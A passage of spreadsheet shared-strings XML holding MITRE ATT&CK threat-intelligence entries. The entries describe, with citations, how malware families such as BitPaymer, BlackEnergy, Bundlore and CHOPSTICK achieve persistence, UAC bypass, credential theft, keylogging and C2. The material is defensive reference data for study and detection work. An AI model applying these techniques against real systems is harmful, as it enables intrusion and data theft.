  </si>
  <si>
    <t xml:space="preserve">[BitPaymer](https://attack.mitre.org/software/S0570) can set values in the Registry to help in execution.(Citation: Crowdstrike Indrik November 2018) </t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) has copied itself to the &lt;code&gt;:bin&lt;/code&gt; alternate data stream of a newly created file.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) has used dynamic API resolution to avoid identifiable strings within the binary, including &lt;code&gt;RegEnumKeyW&lt;/code&gt;.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can search for network shares on the domain or workgroup using &lt;code&gt;net view &lt;host&gt;&lt;/code&gt;.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) has used RC4-encrypted strings and string hashes to avoid identifiable strings within the binary.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[BitPaymer](https://attack.mitre.org/software/S0570) can use the RegEnumKeyW to iterate through Registry keys.(Citation: Crowdstrike Indrik November 2018) </t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) has set the run key &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; for persistence.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can use &lt;code&gt;net view&lt;/code&gt; to discover remote systems.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can enumerate existing Windows services on the host that are configured to run as LocalSystem.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can modify the timestamp of an executable so that it can be identified and restored by the decryption tool.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can use the tokens of users to create processes on infected systems.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>Windows File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can use &lt;code&gt;icacls /reset&lt;/code&gt; and &lt;code&gt;takeown /F&lt;/code&gt; to reset a targeted executable's permissions and then take ownership.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) has attempted to install itself as a service to maintain persistence.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) attempts to bypass default User Access Control (UAC) settings by exploiting a backward-compatibility setting found in Windows 7 and later.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>Clear Windows Event Logs</t>
  </si>
  <si>
    <t>The [BlackEnergy](https://attack.mitre.org/software/S0089) component KillDisk is capable of deleting Windows Event Logs.(Citation: ESEST Black Energy Jan 2016)</t>
  </si>
  <si>
    <t>Code Signing Policy Modification</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has enabled the &lt;code&gt;TESTSIGNING&lt;/code&gt; boot configuration option to facilitate loading of a driver component.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has used a plug-in to gather credentials stored in files on the host by various software programs, including The Bat! email client, Outlook, and Windows Credential Store.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has used a plug-in to gather credentials from web browsers including FireFox, Google Chrome, and Internet Explorer.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) 2 contains a "Destroy" plug-in that destroys data stored on victim hard drives by overwriting file contents.(Citation: Securelist BlackEnergy Feb 2015)(Citation: ESET BlackEnergy Jan 2016)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) injects its DLL component into svchost.exe.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has the capability to communicate over a backup channel via plus.google.com.(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) gathers a list of installed apps from the uninstall program Registry. It also gathers registered mail, browser, and instant messaging clients from the Registry. [BlackEnergy](https://attack.mitre.org/software/S0089) has searched for given file types.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has removed the watermark associated with enabling the &lt;code&gt;TESTSIGNING&lt;/code&gt; boot configuration option by removing the relevant strings in the &lt;code&gt;user32.dll.mui&lt;/code&gt; of the system.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has run a keylogger plug-in on a victim.(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has conducted port scans on a host.(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) can gather very specific information about attached USB devices, to include device instance ID and drive geometry.(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has gathered a process list by using [Tasklist](https://attack.mitre.org/software/S0057).exe.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)(Citation: ESET BlackEnergy Jan 2016)</t>
  </si>
  <si>
    <t>The [BlackEnergy](https://attack.mitre.org/software/S0089) 3 variant drops its main DLL component and then creates a .lnk shortcut to that file in the startup folder.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has run a plug-in on a victim to spread through the local network by using [PsExec](https://attack.mitre.org/software/S0029) and accessing admin shares.(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) is capable of taking screenshots.(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>Services File Permissions Weakness</t>
  </si>
  <si>
    <t>One variant of [BlackEnergy](https://attack.mitre.org/software/S0089) locates existing driver services that have been disabled and drops its driver component into one of those service's paths, replacing the legitimate executable. The malware then sets the hijacked service to start automatically to establish persistence.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has used [Systeminfo](https://attack.mitre.org/software/S0096) to gather the OS version, as well as information on the system configuration, BIOS, the motherboard, and the processor.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has gathered information about network IP configurations using [ipconfig](https://attack.mitre.org/software/S0100).exe and about routing tables using [route](https://attack.mitre.org/software/S0103).exe.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has gathered information about local network connections using [netstat](https://attack.mitre.org/software/S0104).(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) communicates with its C2 server over HTTP.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>A [BlackEnergy](https://attack.mitre.org/software/S0089) 2 plug-in uses WMI to gather victim host details.(Citation: Securelist BlackEnergy Feb 2015)</t>
  </si>
  <si>
    <t>One variant of [BlackEnergy](https://attack.mitre.org/software/S0089) creates a new service using either a hard-coded or randomly generated name.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) can copy files on a compromised host.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) has the ability to find files on the targeted system.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) has the ability to download files to the victim's machine.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) can enumerate local drives on a compromised host.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) can send commands to C2 in the body of HTTP POST requests.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) can run cmd.exe with parameters.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can compress data collected by its SharpHound ingestor into a ZIP file to be written to disk.(Citation: GitHub Bloodhound)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can collect information about domain users, including identification of domain admin accounts.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can collect information about domain groups and members.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) has the ability to map domain trusts and identify misconfigurations for potential abuse.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can identify users with local administrator rights.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>Local Groups</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can collect information about local groups and members.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can use .NET API calls in the SharpHound ingestor component to pull Active Directory data.(Citation: GitHub Bloodhound)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can collect password policy information on the target environment.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can use PowerShell to pull Active Directory information from the target environment.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can enumerate and collect the properties of domain computers, including domain controllers.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can collect information on user sessions.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) can create bind and reverse shells on the infected system.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) has maliciously altered the OpenSSH binary on targeted systems to create a backdoor.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) can download additional modules from the C2 server.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) can use the &lt;code&gt;ps&lt;/code&gt; command to discover other cryptocurrency miners active on the system.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) can download an additional module which has a cryptocurrency mining extension.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) can XOR-encrypt C2 communications.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) has discovered the OS version, CPU model, and RAM size of the system it has been installed on.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) can find the external IP address of the infected host.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) has discovered the username of the user running the backdoor.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) terminates antimalware processes.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>Some [Brave Prince](https://attack.mitre.org/software/S0252) variants have used South  Korea's Daum email service to exfiltrate information, and later variants have posted the data to a web server via an HTTP post command.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) gathers file and directory information from the victim’s machine.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) lists the running processes.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) gathers information about the Registry.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) collects hard drive content and system configuration information.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) gathers network configuration information as well as the ARP cache.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Briba](https://attack.mitre.org/software/S0204) downloads files onto infected hosts.(Citation: Symantec Briba May 2012)</t>
  </si>
  <si>
    <t>[Briba](https://attack.mitre.org/software/S0204) creates run key Registry entries pointing to malicious DLLs dropped to disk.(Citation: Symantec Briba May 2012)</t>
  </si>
  <si>
    <t>[Briba](https://attack.mitre.org/software/S0204) uses rundll32 within [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001) entries to execute malicious DLLs.(Citation: Symantec Briba May 2012)</t>
  </si>
  <si>
    <t>[Briba](https://attack.mitre.org/software/S0204) installs a service pointing to a malicious DLL dropped to disk.(Citation: Symantec Briba May 2012)</t>
  </si>
  <si>
    <t>AppleScript</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can use AppleScript to inject malicious JavaScript into a browser.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can install malicious browser extensions that are used to hijack user searches.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has used &lt;code&gt;openssl&lt;/code&gt; to decrypt AES encrypted payload data. [Bundlore](https://attack.mitre.org/software/S0482) has also used base64 and RC4 with a hardcoded key to deobfuscate data.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can change macOS security settings and browser preferences to enable follow-on behaviors.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has been spread through malicious advertisements on websites.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>GUI Input Capture</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) prompts the user for their credentials.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can download and execute new versions of itself.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can execute JavaScript by injecting it into the victim's browser.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>Launch Agent</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can persist via a LaunchAgent.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can persist via a LaunchDaemon.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has attempted to get users to execute a malicious .app file that looks like a Flash Player update.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has disguised a malicious .app file as a Flash Player update.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has obfuscated data with base64, AES, RC4, and bz2.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has used the &lt;code&gt;ps&lt;/code&gt; command to list processes.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>Python</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has used Python scripts to execute payloads.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>SSH Authorized Keys</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) creates a new key pair with &lt;code&gt;ssh-keygen&lt;/code&gt; and drops the newly created user key in &lt;code&gt;authorized_keys&lt;/code&gt; to enable remote login.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has the ability to enumerate what browser is being used as well as version information for Safari.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) will enumerate the macOS version to determine which follow-on behaviors to execute.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has leveraged /bin/sh and /bin/bash to execute commands on the victim machine.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) uses HTTP requests for C2.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>The [CALENDAR](https://attack.mitre.org/software/S0025) malware communicates through the use of events in Google Calendar.(Citation: Mandiant APT1)(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[CALENDAR](https://attack.mitre.org/software/S0025) has a command to run cmd.exe to execute commands.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[CARROTBALL](https://attack.mitre.org/software/S0465) has the ability to use FTP in C2 communications.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[CARROTBALL](https://attack.mitre.org/software/S0465) has the ability to download and install a remote payload.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[CARROTBALL](https://attack.mitre.org/software/S0465) has been executed through users being lured into opening malicious e-mail attachments.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[CARROTBALL](https://attack.mitre.org/software/S0465) has used a custom base64 alphabet to decode files.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to delete downloaded files from a compromised host.(Citation: Unit 42 CARROTBAT November 2018)</t>
  </si>
  <si>
    <t>[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to download and execute a remote file via [certutil](https://attack.mitre.org/software/S0160).(Citation: Unit 42 CARROTBAT November 2018)</t>
  </si>
  <si>
    <t>[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to download a base64 encoded payload and execute obfuscated commands on the infected host.(Citation: Unit 42 CARROTBAT November 2018)</t>
  </si>
  <si>
    <t>[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to determine the operating system of the compromised host and whether Windows is being run with x86 or x64 architecture.(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to execute command line arguments on a compromised host.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>Compromise Software Supply Chain</t>
  </si>
  <si>
    <t>[CCBkdr](https://attack.mitre.org/software/S0222) was added to a legitimate, signed version 5.33 of the CCleaner software and distributed on CCleaner's distribution site.(Citation: Talos CCleanup 2017)(Citation: Intezer Aurora Sept 2017)(Citation: Avast CCleaner3 2018)</t>
  </si>
  <si>
    <t>[CCBkdr](https://attack.mitre.org/software/S0222) can use a DGA for [Fallback Channels](https://attack.mitre.org/techniques/T1008) if communications with the primary command and control server are lost.(Citation: Talos CCleanup 2017)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) encrypts C2 communications with TLS.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) is capable of performing remote command execution.(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>Part of [APT28](https://attack.mitre.org/groups/G0007)'s operation involved using [CHOPSTICK](https://attack.mitre.org/software/S0023) modules to copy itself to air-gapped machines, using files written to USB sticks to transfer data and command traffic.(Citation: FireEye APT28)(Citation: ESET Sednit Part 2)(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) can use a DGA for [Fallback Channels](https://attack.mitre.org/techniques/T1008), domains are generated by concatenating words from lists.(Citation: ESET Sednit 2017 Activity)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) can switch to a new C2 channel if the current one is broken.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>An older version of [CHOPSTICK](https://attack.mitre.org/software/S0023) has a module that monitors all mounted volumes for files with the extensions .doc, .docx, .pgp, .gpg, .m2f, or .m2o.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) is capable of performing remote file transmission.(Citation: Crowdstrike DNC June 2016)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) used a proxy server between victims and the C2 server.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) is capable of performing keylogging.(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 2)(Citation: DOJ GRU Indictment Jul 2018)</t>
  </si>
  <si>
    <t>Various implementations of [CHOPSTICK](https://attack.mitre.org/software/S0023) communicate with C2 over SMTP and POP3.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) may store RC4 encrypted configuration information in the Windows Registry.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) provides access to the Windows Registry, which can be used to gather information.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>Part of [APT28](https://attack.mitre.org/groups/G0007)'s operation involved using [CHOPSTICK](https://attack.mitre.org/software/S0023) modules to copy itself to air-gapped machines and using files written to USB sticks to transfer data and command traffic.(Citation: FireEye APT28)(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) has the capability to capture screenshots.(Citation: DOJ GRU Indictment Jul 2018)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) checks for antivirus and forensics software.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) encrypts C2 communications with RC4.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023)  includes runtime checks to identify an analysis environment and prevent execution on it.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>Various implementations of [CHOPSTICK](https://attack.mitre.org/software/S0023) communicate with C2 over HTTP.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>Archive via Utility</t>
  </si>
  <si>
    <t>[CORALDECK](https://attack.mitre.org/software/S0212) has created password-protected RAR, WinImage, and zip archives to be exfiltrated.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[CORALDECK](https://attack.mitre.org/software/S0212) has exfiltrated data in HTTP POST headers.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[CORALDECK](https://attack.mitre.org/software/S0212) searches for specified files.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>Binary Padding</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) contains unused machine instructions in a likely attempt to hinder analysis.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) downloads another dropper from its C2 server.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) can communicate over SMTP and POP3 for C2.(Citation: FireEye APT28)(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) obfuscates strings using a custom stream cipher.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) has established persistence by creating autostart extensibility point (ASEP) Registry entries in the Run key and other Registry keys, as well as by creating shortcuts in the Internet Explorer Quick Start folder.(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) is installed via execution of rundll32 with an export named "init" or "InitW."(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) C2 messages are Base64-encoded.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) C2 messages are encrypted with custom stream ciphers using six-byte or eight-byte keys.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) collects hostname, volume serial number and OS version data from the victim and sends the information to its C2 server.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) can communicate over HTTP for C2.(Citation: FireEye APT28)(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) can bypass UAC using the SilentCleanup task to execute the binary with elevated privileges.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) has come signed with revoked certificates.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) has the ability to self delete.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) has the ability to remove values it writes to the Registry.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) can download additional tools to a compromised host.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) has been delivered via malicious documents with embedded macros.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) has attempted to appear as a legitimate Windows service with a fake description claiming it is used to support packed applications.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) can write to the Registry under the &lt;code&gt;%windir%&lt;/code&gt; variable to execute tasks.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) can use the schtasks utility to bypass UAC.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) has been packed with UPX.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) can search loaded modules, PEB structure, file paths, Registry keys, and memory to determine if it is being debugged or running in a virtual environment.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) can use GET requests to download additional payloads from C2.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>Cached Domain Credentials</t>
  </si>
  <si>
    <t>[Cachedump](https://attack.mitre.org/software/S0119) can extract cached password hashes from cache entry information.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to identify open windows on the compromised host.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to compress stolen data into a .cab file.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to record audio from the compromised host.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to steal data from the clipboard.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to log keystrokes on the compromised host.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to steal information about printers and the documents sent to printers.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
